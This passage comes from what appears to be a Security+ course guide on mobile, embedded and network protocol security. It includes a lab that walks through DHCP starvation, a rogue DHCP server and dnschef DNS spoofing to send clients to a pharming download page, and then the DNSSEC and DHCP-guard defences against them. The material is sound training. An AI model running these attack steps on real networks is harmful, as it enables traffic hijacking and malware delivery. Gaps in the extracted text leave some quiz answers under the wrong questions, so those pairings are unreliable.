because these devices tend to be forgotten or overlooked. They don't reside, or live, in
the workplace in the same way as, for example, a desktop computer, and they won't
necessarily be there when virus databases are being updated, patches are being
installed, files are backed up, and so on. Part of the practice of managing these devices
involves making sure that they are kept as secure as devices that reside permanently
within the physical infrastructure. Most mobile policy enforcement and monitoring
procedures rely on installing an MDM software agent to the mobile device.
EMM software can be used for application management. When the device is joined
to the corporate network through enrollment with the EMM software, it can be
configured into a corporate "workspace" mode in which only a certain number of
whitelisted applications can run.
EMM software such as Microsoft Intune can be used to approve or prohibit apps. (Screenshot used
with permission from Microsoft.)
Third-party developers can create apps using the relevant Apple or Android Software
Development Kit (SDK). Apps have to be submitted to and approved by the vendor
before they are released to users. Apps are made available for free or can be bought
from the iTunes App Store or Google Play (or other marketplace supported by the
device).
There is an Apple Developer Enterprise program allowing corporate apps to be
distributed to employees without having to publish them in the app store. Android
allows third-party or bespoke programs to be installed directly via an Android
Application Package (apk) file, giving users and businesses the flexibility to directly
install apps (sideload) without going through the storefront interface. MDM software
often has the capability to block unapproved app sources.
Restricting device permissions such as camera and screen capture using Intune. (Screenshot used with
permission from Microsoft.)
the app developer can target notifications to some or all users with that app installed.
Developers need to take care to properly secure the account and services used to send
push notifications. There have been examples in the past of these accounts being
hacked and used to send fake communications.
Note: To learn more, watch the related Video on the course website.
• Enforce policies to curtail or disable the use of certain mobile device activities that
bring unwanted risk to the organization.
• Consider the different ways that mobile devices can be deployed in your
organization.
• Be aware of the inherent risks of allowing BYOD in your organization.
• Apply various security controls to combat BYOD risks, such as making decisions
about ownership, encouraging the use of anti-malware apps, providing users with
the tools and knowledge to uphold privacy, and more.
Activity 11-3
Discussing Mobile Device Systems
Design
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What type of deployment model(s) allow users to select the mobile device
make and model?
Bring Your Own Device (BYOD) and Choose Your Own Device (CYOD).
Virtual Desktop Infrastructure (VDI) allows a client device to access a VM. In this
scenario, the mobile device is the client device. Corporate data is stored and
processed on the VM so there is less chance of it being compromised, even
though the client device itself is not fully managed.
3. Company policy requires that you ensure your smartphone is secured from
unauthorized access in case it is lost or stolen. To prevent someone from
accessing data on the device immediately after it has been turned on, what
security control should be used?
Screen lock.
4. An employee's car was recently broken into, and the thief stole a company
tablet that held a great deal of sensitive data. You've already taken the
precaution of securing plenty of backups of that data. What should you do
to be absolutely certain that the data doesn't fall into the wrong hands?
An attacker might set up some sort of rogue access point (Wi-Fi) or cell tower
(cellular) to perform eavesdropping or Man-in-the-Middle attacks. For Personal
Area Network (PAN) range communications, there might be an opportunity for
an attacker to run exploit code over the channel.
6. Why would you need to deploy SATCOM and what sort of assessments
should you make?
True (in theory)—though the vector is known to the mobile OS and handset
vendors so the exploit is unlikely to be able to run without user authorization.
The user installs an app directly onto the device rather than from an official app
store.
9. Why might a company invest in device control software that prevents the
use of recording devices within company premises?
Topic D
Implement Secure Embedded Systems
Design
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
3.5 Explain the security implications of embedded systems.
As well as the obvious computing hosts (PCs, laptops, servers, network appliances, and
mobiles) within your networks, you must also account for the security of embedded
systems. Embedded computing functionality can be found in consumer electronics
devices and in specialist monitoring and control systems, so it is important that you
know how to identify and secure these devices.
EMBEDDED SYSTEMS
An embedded system is a complete computer system that is designed to perform a
specific, dedicated function. These systems can be as contained as a microcontroller in
an intravenous drip-rate meter or as large and complex as an industrial control system
managing a water treatment plant. Embedded systems are typically static
environments. A PC is a dynamic environment. The user can add or remove programs
and data files, install new hardware components, and upgrade the operating system. A
static environment does not allow or require such frequent changes.
In terms of security, this can be ideal because unchanging (versus dynamic)
environments are typically easier to protect and defend. Static computing
environments pose several risks, however. A static environment is often a black box to
security administrators. Unlike an OS environment such as Windows, there may be
little support for identifying and correcting security issues.
Updates for embedded systems are possible, but usually only through specific
management interfaces. Embedded systems are normally based on firmware running
on a Programmable Logic Controller (PLC). If updates are supported by the vendor
or manufacturer, this firmware can be patched and reprogrammed. The method used
to do so must be carefully controlled.
Consequently, these systems often use differently engineered platforms called Real
Time Operating Systems (RTOS).
MEDICAL DEVICES
Medical devices represent an array of systems potentially vulnerable to a wide range
of attacks. It is important to recognize that use of these devices is not confined to
hospitals and clinics but includes portable devices such as cardiac monitors/
defibrillators and insulin pumps. As well as unsecure communication protocols, many
of the control systems for these devices run on unsupported versions of operating
systems (such as Windows XP) because the costs of updating the software to work with
newer OS versions is high and disruptive to patient services. Some of the goals of
attacks on medical devices and services are as follows:
• Use compromised devices to pivot to networks storing medical data with the aim of
stealing Protected Health Information (PHI).
• Hold medical units ransom by threatening to disrupt services.
• Kill or injure patients (or threaten to do so) by tampering with dosage levels or
device settings.
Another rapidly developing sector is that of Unmanned Aerial Vehicles (UAV). This
sector ranges from full-size fixed wing aircraft to much smaller multi-rotor hover
drones. As with other vehicle systems, there is the potential to use the
communications channels to interfere with the drone, potentially causing it to crash or
go off course. For example, researchers have successfully diverted a drone aircraft by
sending it spoofed GPS responses. Drones may also be used to perform surveillance or
perform other types of attacks (scattering infected USB sticks, for instance).
Note: It seems incredible, but the tactic of dropping infected USB sticks in car parks is still
successful. Studies continue to show that a significant percentage of people cannot resist
plugging in a found USB stick (https://www.blackhat.com/docs/us-16/materials/
us-16-Bursztein-Does-Dropping-USB-Drives-In-Parking-Lots-And-Other-Places-
Really-Work.pdf).
NETWORK SEGMENTATION
Network segmentation is one of the core principles of network security. Network
access for static environments should only be required for applying firmware updates
and management controls from the host software to the devices and for reporting
status and diagnostic information from the devices back to the host software. This
control network should be separated from the corporate network using firewalls and
VLANs.
With environments such as SCADA, the management software may require legacy
versions of operating systems, making the hosts particularly difficult to secure.
Isolating these hosts from others through network segmentation and using endpoint
security (preventing the attachment of USB devices) can help to ensure they do not
become infected with malware or exposed to network exploits.
Note: In addition to the standard set of security tools and devices, such as firewalls and
VPNs, many SCADA are not connected to outside networks at all, known as an air gap.
APPLICATION FIREWALLS
As embedded devices make greater use of a network for diagnostic reporting and
updating, they are exposed to greater risks. These risks could be mitigated by
deploying application firewalls. These are firewalls designed to protect specific
applications and devices, such as a SCADA. This sort of dedicated firewall software to
protect the management software and embedded device's network interfaces is
relatively difficult to find for embedded systems, though solutions are starting to
appear. The main issue with firewalls implemented on the device firmware is the lack
of processing power and memory space available to run such functions.
WRAPPERS
One way of increasing the security of data in transit for embedded systems is through
the use of wrappers. A wrapper usually includes a header, which precedes the
encapsulated data, and a trailer, which follows it. An excellent example of wrappers
used for security with IPSec run in tunnel mode, wherein the entire original packet,
including the data and the AH, ESP, TCP/UDP, and IP headers are all encapsulated. The
only thing visible to an attacker or anyone sniffing the wire is the IPSec header, which
describes only the tunnel endpoints. This is useful for protecting traffic between
trusted networks when the traffic has to go through an untrusted network to go
between them, or between trusted nodes on the same network.
to date with patches, but for many embedded systems and static environments, it is
far more of a challenge:
• Many embedded systems use low-cost firmware chips and the vendor never
produces updates to fix security problems or only produces updates for a relatively
short product cycle (while the device could remain in operational use for much
longer).
• Many embedded systems require manual updates, which are perceived as too time-
consuming for a security department with other priorities to perform.
Activity 11-4
Discussing Secure Embedded Systems
Design
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What are SCADA devices and what are the security issues associated with
them?
3. What is a UAV?
An Unmanned Aerial Vehicle (UAV) is more popularly referred to as a drone.
Summary
In this lesson, you continued the review of network architecture and design by looking
at host security issues and technologies.
• You should understand the risks posed by vulnerabilities in host and peripheral
device firmware, unsupported software, embedded systems, and Internet of Things
appliances.
• You should be able to configure a host with a baseline security template, including
firmware and OS security configuration settings plus effective patch management
procedures.
• Be aware of endpoint security suites with the ability to perform execution control
and restrict access to USB devices.
• You should understand the risks posed by mobile network connection methods and
by the features available to mobile devices.
• You should be able to suggest an appropriate deployment model for a given
scenario and identify the features available in management software for controlling
use of a mobile device and accessing enterprise applications and data securely.
What challenges does your organization face in regard to securing mobile devices
and IoT systems?
A: Answers will vary, but might include the proliferation of mobile devices and also
smart devices that are used to access corporate data, and the potential attacks
that they are vulnerable to because of the technology being used.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
When hosts join a network, they need to be configured with the appropriate settings for that
network. The services that provide these settings, such as DHCP and DNS, must be deployed
securely. You will also need to configure secure protocols that allow users to access networks, host
desktops, and appliance configuration interfaces remotely. This lesson looks specifically at some of
the protocols used to implement different kinds of network access, such as automatic addressing,
name resolution, Virtual Private Networking (VPN), and remote management.
LESSON OBJECTIVES
In this lesson, you will:
• Implement secure network operations protocols.
• Implement secure remote access protocols.
• Implement secure remote administration protocols.
Topic A
Implement Secure Network Operations
Protocols
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
2.6 Given a scenario, implement secure protocols.
Configuring DHCP on Windows Server. (Screenshot used with permission from Microsoft.)
Administration of the DHCP server itself must be carefully controlled and the settings
checked regularly. If an attacker compromises the DHCP server, he or she could point
network clients to rogue DNS servers and use that as a means to direct users to
spoofed websites. Another attack is to redirect traffic through the attacker's machine
by changing the default gateway, enabling the attacker to snoop on all network traffic.
The best defenses against attacks on DHCP are accomplished by general network
security best practices:
• Use scanning and intrusion detection to pick up suspicious activity.
• Enable logging and review the logs for suspicious events.
• Disable unused ports and perform regular physical inspections to ensure that
unauthorized devices are not connected via unused jacks.
• Enable DHCP snooping on switch access ports to prevent the use of unauthorized
DHCP servers.
Attacks on DNS may also target the server application and/or configuration. Many DNS
services run on BIND (Berkley Internet Name Domain), distributed by the Internet
Software Consortium (http://www.isc.org). There are known vulnerabilities in many
versions of the BIND server, so it is critical to patch the server to the latest version. The
same general advice applies to other DNS server software, such as Microsoft's. Obtain
and check security announcements and then test and apply critical and security-
related patches and upgrades.
DNS footprinting means obtaining information about a private network by using its
DNS server to perform a zone transfer (all the records in a domain) to a rogue DNS or
simply by querying the DNS service, using a tool such as nslookup or dig. To prevent
this, you can apply an Access Control List to prevent zone transfers to unauthorized
hosts or domains, to prevent an external server from obtaining information about the
private network architecture.
You should also consider that DNS is a critical service that should be configured to be
fault tolerant. DoS attacks are hard to perform against the servers that perform
Internet name resolution, but if an attacker can target the DNS server on a private
Windows Server DNS services with DNSSEC enabled. (Screenshot used with permission from Microsoft.)
The Key Signing Key for a particular domain is validated by the parent domain or host
ISP. The top-level domain trusts are validated by the Regional Internet Registries and
the DNS root servers are self-validated, using a type of M-of-N control group key
signing. This establishes a chain of trust from the root servers down to any particular
subdomain.
TYPOSQUATTING/DOMAIN HIJACKING
Cybersquatting is an attack where an adversary acquires a domain for a company's
trading name or trademark, or perhaps some spelling variation thereof. While there
are often trademark and intellectual property laws against doing this, companies need
to be careful to renew domain names that they want to continue to use and to protect
the credentials used to manage the registration. A domain name must be re-registered
every year. The following attacks all exploit the domain name registration process in
some way:
• Domain hijacking—an adversary gains control over the registration of a domain
name, allowing the host records to be configured to IP addresses of the attacker's
choosing. This might be accomplished by supplying false credentials to the domain
registrar when applying for a new domain name or re-registering an existing one.
An attacker might also be able to exploit the legitimate account used to manage the
domain (via a weak password or RAT installed on a client computer) or even to
compromise the domain registrar's security procedures in some way.
• Typosquatting—misspelled domains can be profitable depending on the frequency
that users enter the misspelled name (for example, visiting amazoon.com or
amazun.com). This is also referred to as URL hijacking. Such domains can generate
advertising revenue through Google™ or be used to host malware or launch
pharming attacks.
Note: URL hijacking can also refer to use of HTTP redirects to exploit Search Engine
Optimization (SEO). When a browser encounters a redirect header, it opens the URL
referred to in the redirect rather than the one the user typed. In this type of URL
hijacking attack, the malicious site contains a page with a redirect to the popular site.
This could lead to the legitimate site being delisted by the search engine and the
malicious site appearing in its place.
• Kiting—a domain name can be registered for up to five days without paying for it.
Kiting means that the name is continually registered, deleted, then re-registered.
• Tasting—this is the registration of a domain to test how much traffic it generates
within the five-day grace period; if the domain is not profitable, the registration is
never completed.
• Use difficult-to-guess community names; never leave the community name blank or
set to the default.
• Use Access Control Lists to restrict management operations to known hosts (that is,
restrict to one or two host IP addresses).
SNMP v3 supports encryption and strong user-based authentication. Instead of
community names, the agent is configured with a list of usernames and access
permissions. When authentication is required, the SNMP message is signed with an
MD5 (or SHA) hash of the user's passphrase. The agent can verify the signature and
authenticate the user using its own record of the passphrase.
SNMP v3 can also use DES or (in most products) AES to encrypt the contents of traps
and query responses.
A query can be set to use no security (noAuthNoPriv), authentication only (authNoPriv),
or authentication and encryption (authPriv).
TIME SYNCHRONIZATION
Many applications on networks are time dependent and time critical, such as
authentication and security mechanisms, scheduling applications, or backup software.
The Network Time Protocol (NTP) provides a transport over which to synchronize
these time dependent applications. NTP works over UDP on port 123.
Top-level NTP servers (stratum 1) obtain the Coordinated Universal Time (UTC) from a
highly accurate clock source, such as an atomic clock. Lower tier servers then obtain
the UTC from multiple stratum 1 servers and sample the results to obtain an
authoritative time. Most organizations will use one of these stratum 2 servers to obtain
the time for use on the LAN. Servers at lower tiers may then perform the same sort of
sampling operation, adjust for the delay involved in propagating the signal, and
provide the time to clients. Clients themselves usually obtain the time using a modified
form of the protocol (Simple NTP).
Activity 12-1
Discussing Secure Network Operations
Protocols
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
3. True or false? The contents of the HOSTS file are irrelevant as long as a DNS
service is properly configured.
False (probably)—the contents of the HOSTS file are written to the DNS cache
on startup. It is possible to edit the registry to prioritize DNS over HOSTS,
though.
Corrupting the records of a DNS server to point traffic destined for a legitimate
domain to a malicious IP address.
5. True or false? DNSSEC depends on a chain of trust from the root servers
down.
True.
Configure strong community names and use Access Control Lists to restrict
management operations to known hosts.
Activity 12-2
Implementing Secure Network
Addressing Services
SCENARIO
Attacks against core network services such as DHCP and DNS can represent powerful
exploits. In this activity, you will use a rogue DHCP server to misconfigure DNS settings
on clients, thereby gaining the ability to hijack other services. This activity is designed
to test your understanding of and ability to apply content examples in the following
CompTIA Security+ objectives:
• 1.2 Compare and contrast types of attacks.
• 2.6 Given a scenario, implement secure protocols.
1. Connect the KALI penetration testing VM to the local network and set up a basic
pharming site.
a) In Hyper-V Manager on the HOST, open the connection window for the KALI VM.
From the connection window menu, select File→Settings.
b) Select the eth0 node. In the right-hand pane, under Virtual switch, select vLOCAL.
Select OK.
c) Log on with the credentials root and Pa$$w0rd
d) Right-click the desktop and select Open Terminal. Run the following commands to
set up the pharming site:
cp updates-exploit/*.* /var/www/html/
service apache2 start
firefox http://localhost/updates.htm
The browser should show the fake landing page, with a link to a download file under
the Today! heading below the splash image.
e) Open this web page to view the legitimate site hosted on the MS1 VM:
http://updates.corp.515support.com
The Daily report at the bottom of the page shows nothing to report.
f) Close the browser.
2. Configure a spoofed DNS service and a DHCP starvation attack to force clients
joining the network to use a rogue DHCP server and receive a malicious DNS
resolver configuration.
a) Still on the KALI VM, run the following command in the terminal (ignore the line break
and type as a single command):
dnschef ‑‑fakeip=10.1.0.192 ‑‑fakedomains=updates.corp.
515support.com ‑‑interface=10.1.0.192 ‑‑nameservers=10.1.0.1
Configuring the rogue DHCP attack. (Screenshot used with permission from IPHelix.)
h) When the tool reports that DHCP exhaustion is complete, switch to the terminal
hosting msf, start the rogue DHCP server by entering this command:
run
Running the rogue DHCP server after performing a DHCP starvation attack on the
legitimate server. (Screenshot used with permission from IPHelix.)
i) Switch to the PC1 VM and at the PowerShell prompt, run the following command:
ipconfig /renew Ethernet
j) Open the following URL in the browser, pretending that it is the normal update
information page for the network:
http://updates.corp.515support.com/updates.htm
The pharming site with the link to "7-zip" (it isn't 7-zip), should be shown.
k) Close the browser.
l) Switch to the KALI VM.
dnschef is proxying lots of traffic as the Windows VMs try to discover what's
happened to the Microsoft services they're used to contacting (OneDrive, Windows
Update, and so on). This attack was targeted on a particular subdomain, rather than
all corp.515support.com DNS records. The latter would result in a DoS attack, but it
would be much more likely to be discovered quickly.
m) Run the following commands in the terminal hosting msf—substitute x with the job
ID number (probably 0):
jobs -l
kill x
n) In the terminal hosting dnschef, press Ctrl+C to halt.
o) Leave all terminals open.
i) Right-click in some empty space and select Refresh to see the signature records
(RRSIG).
The DNSKEY records contain the public key required to read the signatures. The
NSEC3 records are used to answer queries for non-existent domains or hosts in such
a way as to prevent enumeration of the zone contents.
5. One issue with DNSSEC is that each client must be configured to require signed
zone records, or the system remains vulnerable to a combination DoS attack on
the valid server/spoofing attack on the clients. Ensure that all domain computers
use the validated records.
a) In Server Manager, select Tools→Group Policy Management.
b) In the Group Policy Management console, expand Forest→Domains→corp.
515support.com. Right-click 515support Domain Policy and select Edit.
c) In the Group Policy Management Editor, expand Computer
Configuration→Policies→Windows Settings→Name Resolution Policy.
d) In the Namespace box, enter corp.515support.com and leave the list box set to
Suffix.
e) Select to check the Enable DNSSEC in this rule box.
f) Check the Require DNS clients to check check box.
g) Select the Generic DNS Server tab then check the Enable DNS settings check box.
h) Select the Add button then in the DNS server box, type 10.1.0.1 and select Add.
Note: This setting forces the client to use a particular server (or servers) to
resolve queries for the policy scope. On a production network, you would
need to specify multiple servers for fault tolerance and redundancy.
Configuring clients to use DNSSEC. (Screenshot used with permission from Microsoft.)
The policy will be added to the table below. (You may need to scroll the window to see
it).
j) Select the Apply button at the bottom of the window.
k) Switch to the MS1 VM. In the DHCP console, expand MS1→IPv4→Scope→Address
Leases. Press Ctrl+A then Delete to remove all the existing leases. Confirm by
selecting Yes.
a) Switch back to the PC1 VM and in the Administrator: Windows PowerShell window,
run the following commands:
ipconfig /renew Ethernet
gpupdate
Get-DnsClientNrptPolicy
Resolve-Dnsname updates.corp.515support.com -DnsSecOK
The output should show that validation is required for the corp.515support.com
domain and that updates.corp.515support.com is a signed CNAME record pointing
to the host MS1 with the IP address 10.1.0.2.
Querying DNS for signed records. (Screenshot used with permission from Microsoft.)
7. To further test the validation policy, re-run the DHCP spoofing attack.
nslookup still returns poisoned results. (Screenshot used with permission from Microsoft.)
i) The query returns the signed records, regardless of the DNS resolver configured by
DHCP. Run the following command:
nslookup updates.corp.515support.com
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 12: Implementing Secure Network Access Protocols | Topic A
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 501
nslookup does not follow the NRPT policy so uses the DHCP-assigned server and
returns the poisoned record.
j) Run the following command:
ipconfig /release
k) In the KALI VM, run the following commands in the terminal hosting msf—substitute
x with the job ID number (probably 1):
jobs -1
kill x
l) In the terminal hosting dnschef, press Ctrl+C to halt.
m) Leave all the terminals open.
8. Most networks defend against DHCP poisoning attacks (and related ARP spoofing
attacks) by enforcing switch port security controls. You can simulate these in
Hyper-V's virtual switch by adjusting the VM configuration.
a) On the MS1 VM, in the DHCP console, refresh the view and delete any leases
obtained.
b) Switch to the KALI VM. From the connection window menu, select File→Settings.
c) Select to expand the eth0 node and select Advanced Features.
d) Select to uncheck the Enable MAC address spoofing box and check the Enable
DHCP guard check box.
e) Select OK.
f) On the KALI VM, run the scripts again.
dnschef
pig.py
(You can use the Up Arrow key to select them from the terminal history). Watch the
pig.py output to see if any leases are obtained (none should be).
g) Once the DHCP starvation attack has run its course, in the terminal hosting msf, type
run and press Enter to start the rogue DHCP server again.
h) Does it work this time? Ignore the confirmation message on KALI, and check for
leases in the DHCP console on MS1.
i) On the PC1 VM, run this command to confirm that you can obtain a lease from the
valid server.
ipconfig /renew Ethernet
j) Browse the pharming URL:
http://updates.corp.515support.com/updates.htm
You should receive a File not found error.
k) Browse the root of the site—You should see the legitimate update page:
http://updates.corp.515support.com
The configuration changes you made to the VM prevent KALI from spoofing MAC
addresses, causing the attacks to fail.
Topic B
Implement Secure Remote Access
Protocols
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
3.2 Given a scenario, implement secure network architecture concepts.
With today's mobile workforce, most networks have to support connections by remote
employees, contractors, and customers to their network resources. These remote
connections often make use of untrusted public networks, such as the Internet.
Consequently, understanding how to implement secure remote access protocols will
be a major part of your job as an information security professional.
SITE-TO-SITE VPN
This model connects two or more local networks, each of which runs a VPN gateway (or
router/VPN concentrator). Where remote access VPN connections are typically initiated
by the client, a site-to-site VPN is configured to operate automatically. The gateways
exchange security information using whichever protocol the VPN is based on. This
establishes a trust relationship between the gateways and sets up a secure connection
through which to tunnel data. Hosts at each site do not need to be configured with any
information about the VPN. The routing infrastructure at each site determines whether
to deliver traffic locally or send it over the VPN tunnel.
normally be processed by a RADIUS server. Once the user is authenticated and the
connection fully established, the RAS server tunnels all communications for the local
network over the secure socket.
Configuring a client certificate for mutual authentication in the pfSense security appliance. (Screenshot
used with permission from Rubicon Communications, LLC.)
Note: The port can be either TCP or UDP. UDP might be chosen for marginally superior
performance, especially when tunneling latency-sensitive traffic such as voice or video.
TCP might be easier to use with a default firewall policy. TLS over UDP is also referred to
as Datagram TLS (DTLS).
Configuring an OpenVPN server in the pfSense security appliance. (Screenshot used with permission
from Rubicon Communications, LLC.)
IPSec datagram using AH—The integrity of the payload and IP header is ensured by the Integrity Check
Value (ICV), but the payload is not encrypted.
IPSec datagram using ESP—The TCP header and payload from the original packet is encapsulated
within ESP and encrypted to provide confidentiality.
Note: The principles underlying IPSec are the same for IPv4 and IPv6, but the header
formats are different. IPSec makes use of extension headers in IPv6 while in IPv4, ESP and
AH are allocated new IP protocol numbers (50 and 51), and either modify the original IP
header or encapsulate the original packet (see the following Transport and Tunnel Modes
section).
Configuring an IPSec tunnel in the pfSense security appliance. (Screenshot used with permission from
Rubicon Communications, LLC.)
Configuring IKE in the pfSense security appliance. (Screenshot used with permission from Rubicon
Communications, LLC.)
The Internet Key Exchange (IKE) protocol is the part of the IPSec protocol suite that
handles authentication and key exchange, referred to as Security Associations (SA).
IKE is also referred to as Internet Security Association and Key Management
Protocol (ISAKMP). IKE negotiations use UDP port 500. The negotiations take place
over two phases:
• Phase I establishes the identity of the two hosts and performs key agreement using
the Diffie-Hellman algorithm to create a secure channel. Phase 1 is usually initiated
in Main Mode, which involves six messages (two to propose an IKE SA, two to agree
on DH keys, and then two to exchange identifiers securely). The alternative is
Aggressive Mode, which packs the information in these six messages into three
messages. This is quicker but means that identifiers are exchanged in the clear. This
may allow a snooper to perform a dictionary or brute-force password-guessing
attack on the authentication information.
Diffie-Hellman key agreement establishes the shared secret used to sign the
packets for message integrity. Diffie-Hellman does not authenticate the endpoints,
however. Two methods of authenticating hosts are commonly used:
• PKI—the hosts use certificates issued by a mutually trusted Certificate Authority
to identify one another. This is the most secure mechanism but requires PKI
architecture.
• Pre-shared Key (Group Authentication)—the same passphrase is configured on
both hosts. A Pre-Shared Key (PSK) is also referred to as group authentication, as
a single password or passphrase is shared between all hosts. Obviously, this is
not very secure, as it is difficult to keep the pre-shared key a secret known only
to valid hosts. It can also be difficult to change the key.
• Phase II uses the secure channel created in Phase 1 to establish which ciphers and
key sizes will be used with AH and/or ESP in the IPSec session.
This first version of IKE is set up to ensure the mutual authentication of two peer
hosts. On its own, it does not provide a simple means for a client user account to
authenticate to a remote network. Consequently, for remote access VPNs, a
combination of IPSec with the Layer 2 Tunneling Protocol (L2TP) VPN protocol is
most often used. With L2TP/IPSec, the client and server machines can authenticate
using digital certificates or a pre-shared key. The user can then authenticate to the
remote access server using whatever method is supported (MS-CHAP or EAP, for
instance). L2TP uses UDP port 1701 for data and connection control.
IKE v2
The drawbacks of the original version of IKE were addressed by an updated protocol.
IKE v2 has some additional features that have made the protocol popular for use as a
standalone remote access VPN solution. The main changes are:
• Support for EAP authentication methods, allowing, for example, user authentication
against a RADIUS server.
• Simplified connection set up—IKE v2 specifies a single 4-message setup mode,
reducing bandwidth without compromising security.
• Reliability—IKE v2 allows NAT traversal and MOBIKE multihoming. Multihoming
means that a client such as a smartphone with multiple interfaces (such as Wi-Fi
and cellular) can keep the IPSec connection alive when switching between them.
Compared to L2TP/IPSec, using IKE v2 is more efficient. This solution is becoming much
better supported, with native support in Windows 10, for instance.
VPN CONCENTRATORS
All the major NOS are bundled with software supporting VPNs. A server configured in
this role is usually called a Network Access Server (NAS) or Remote Access Server
(RAS). Where the functionality is part of a router or dedicated security appliance, it
may be called a VPN concentrator. In either case, the server would be placed on the
network edge, protected by a firewall configuration in a Demilitarized Zone (DMZ).
The drawbacks of using a software solution for VPN are security (the server is exposed
to the Internet) and performance (if the server is performing other tasks). A hardware
or appliance-based solution overcomes these problems and a range of devices is
available to meet different performance requirements at different price points. Many
SOHO routers support IPSec and/or SSL VPNs with tens of simultaneous connections.
These are all-in-one boxes combining the functions of VPN, Internet router, firewall,
and DSL modem.
There are also dedicated SSL VPN concentrator appliances, such as those from
Netgear®, again aimed at the SME market. These are intended to be installed alongside
a router, firewall, or IPSec VPN to enable secure access to web applications on the
corporate intranet or extranet. Heavyweight, dedicated VPN concentrator appliances,
such as Cisco's 3000 and 5000 series, provide scalable performance for hundreds or
thousands of users. This type of product is no longer marketed, however (both the
3000 and 5000 series have been discontinued), as the same functionality is more
economically incorporated into enterprise-class routers.
Configuring a pfSense security appliance as a VPN concentrator and RADIUS client—This avoids having
to host the authentication server on the network edge. (Screenshot used with permission from Rubicon
Communications, LLC.)
ALWAYS-ON VPN
Traditional VPN solutions require the user to initiate the connection and enter their
authentication credentials. An always-on VPN means that the computer establishes
the VPN whenever an Internet connection over a trusted network is detected, using the
user's cached credentials to authenticate. Microsoft has an Always On VPN solution for
Windows Server 2016 and Windows 10 clients (https://docs.microsoft.com/en-us/
windows-server/remote/remote-access/vpn/always-on-vpn/deploy/always-on-
vpn-deploy-deployment) and an OpenVPN client can be configured to autoconnect
(https://openvpn.net/vpn-server-resources/setting-your-client-to-automatically-
connect-to-your-vpn-when-your-computer-starts).
Note: To learn more, watch the related Video on the course website.
Activity 12-3
Discussing Secure Remote Access
Protocols
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. True or false? A TLS VPN can only provide access to web-based network
resources.
False—a Transport Layer Security (TLS) VPN uses TLS to encapsulate the private
network data and tunnel it over the network. The private network data could be
frames or IP-level packets and is not constrained by application-layer protocol
type.
3. What IPSec mode would you use for data confidentiality on a private
network?
Rather than just providing mutual authentication of the host endpoints, IKEv2
supports a user account authentication method, such as Extensible
Authentication Protocol (EAP).
Activity 12-4
Implementing a Virtual Private
Network
SCENARIO
A Virtual Private Network (VPN) can allow two sites to be networked together over the
Internet or allow remote users to "dial-in" to a site over the Internet (or any other
untrusted transport network). VPN protocols support some sort of encryption
mechanism to prevent eavesdropping, replay, or modification attacks. There also must
be a secure authentication mechanism to ensure that only authorized users can
connect.
This activity is designed to test your understanding of and ability to apply content
examples in the following CompTIA Security+ objectives:
• 2.1 Install and configure network components, both hardware- and software-based,
to support organizational security.
• 2.6 Given a scenario, implement secure protocols.
• 3.2 Given a scenario, implement secure network architecture concepts.
Here is a reference image of the network topology as it will be configured in your lab
environment.
Network topology—The PFSENSE security appliance will act as a VPN gateway so that clients
connecting from any of the external nets can connect to the Windows machines on the LAN. (Image ©
123RF.com.)
1. Configure the RADIUS server role on the Domain Controller so that it can process
access requests from the VPN access device (the pfSense firewall). Microsoft's
RADIUS implementation is called Network Policy Server (NPS). Start by installing
the NPS role.
a) Open a connection window for the DC1 VM and sign in as 515support\Administrator
with the password Pa$$w0rd
b) In Server Manager, select the Dashboard node, then select the Add roles and
features link.
c) In the wizard, if the Before you begin page appears, select Next.
d) On the Select installation type page, ensure Role-based or feature-based
installation is selected, then select Next.
e) On the Select destination server page, ensure Select a server from the server
pool is selected, and DC1.corp.515support.com is selected in the Server Pool list,
then select Next.
f) On the Select server roles page, select the Network Policy and Access Services
check box.
g) In the Add Roles and Features Wizard dialog box, ensure the Include management
tools (if applicable) check box is selected, then select the Add Features button.
h) On the Select server roles page, select Next.
i) On the Select features page, select Next.
j) On the Network Policy and Access Services page, select Next.
k) On the Confirm installation options page, select Install.
l) When the installation has completed, select Close.
2. Register the NPS server and configure a client. Remember, in RADIUS architecture,
the client is the access device. In this activity, the client will be the PFSENSE VM
(10.1.0.254).
a) In Server Manager, select Tools→Network Policy Server.
Network Policy Server management console. (Screenshot used with permission from
Microsoft.)
e) In the New RADIUS Client dialog box, in the Friendly name box, enter pfsense.corp.
515support.com
f) In the Address box, type 10.1.0.254
g) Under Shared Secret, select the Generate radio button then select the Generate
button.
Configuring a RADIUS client connection on the RADIUS server. (Screenshot used with
permission from Microsoft.)
Note: You need to keep this value in the clipboard for a while—alternatively
paste it into a Notepad file.
g) Select OK then select OK again to confirm the Windows Groups dialog box message.
Configuring access conditions for a network policy. (Screenshot used with permission from
Microsoft.)
Note: This gives all domain users VPN access rights. You are only doing this to
simplify the activity. In a production network, you would restrict access to a
defined security group.
h) Select Next.
i) On the Specify Access Permission page, leave Access granted selected and select
Next.
j) Under EAP Types, select the Add button. In the Add EAP dialog box, select Microsoft:
Secured password (EAP-MSCHAP v2) then select OK.
k) Uncheck all the boxes under Less secure authentication methods.
l) Select Next.
g) Click in the Shared Secret box and paste the clipboard value.
Configuring a RADIUS server connection on the RADIUS client. (Screenshot used with
permission from Rubicon Communications, LLC.)
h) Select the Save button.
5. Configure the prerequisites for IKEv2 on the pfSense firewall to deploy it as a VPN
concentrator. First, create a self-signed CA for the appliance.
a) In the pfSense web app, select System→Cert. Manager.
b) On the CAs tab, select the Add button. Complete the page with the following
information:
• Descriptive name—enter 515support VPN CA
• Method—select Create an internal Certificate Authority.
• State/City—enter whichever locale you prefer.
• Organization/OU—enter 515support VPN
• Email address—enter [email protected]
• Common Name—enter 515supportVPN-CA
c) Select Save.
d) When the new certificate has been created, select the Export CA icon.
